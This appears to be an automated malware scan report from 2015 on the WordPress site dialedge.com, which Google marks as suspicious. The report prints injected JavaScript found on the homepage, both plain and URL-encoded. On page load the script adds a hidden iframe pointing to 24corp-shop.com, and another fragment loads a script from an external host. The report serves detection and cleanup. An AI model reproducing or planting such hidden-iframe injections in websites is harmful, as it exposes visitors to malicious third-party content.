Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dialedge.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.dialedge.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 30 Jan 2015 21:49:27 GMT Location: http://dialedge.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://dialedge.com/xmlrpc.php | clean |
http://dialedge.com/ | 200 OK Content-Length: 37340 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: ...[13994 bytes skipped]... nload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.src%20%3D%20%27http%3A//24corp-shop.com%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.width%20%3D%20%27180px%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.height%20%3D%20%27200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var I1O=document.createElement('script');I1O.src='http://jqueryap ...[1733 bytes skipped]... | ||
http://dialedge.com/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57276 Content-Type: application/x-javascript | clean |
http://dialedge.com/wp-content/themes/Charlie/lib/featured-images/js/jquery.cross-slide.js?ver=2.8.4 | 200 OK Content-Length: 11048 Content-Type: application/x-javascript | clean |
http://dialedge.com/wp-content/themes/Charlie/lib/contact-page-plugin/js/md5.js?ver=2.8.4 | 200 OK Content-Length: 8827 Content-Type: application/x-javascript | clean |
http://dialedge.com/wp-content/themes/Charlie/lib/contact-page-plugin/js/contact-page-plugin.js?ver=2.8.4 | 200 OK Content-Length: 510 Content-Type: application/x-javascript | clean |
http://adultbiz.in/new/jquery.php | 200 OK Content-Length: 1477 Content-Type: text/html | clean |
http://parkingcrew.net/assets/scripts/js3.js | 200 OK Content-Length: 17915 Content-Type: application/javascript | clean |
http://adultbiz.in/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dialedge.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 21:49:28 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://dialedge.com/xmlrpc.php
GET / HTTP/1.1
Host: dialedge.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 21:49:28 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://dialedge.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: dialedge.com
Referer: http://www.google.com/search?q=dialedge.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dialedge.com
Referer: http://www.google.com/search?q=dialedge.com
Result:
The result is similar to the first query. There are no suspicious redirects found.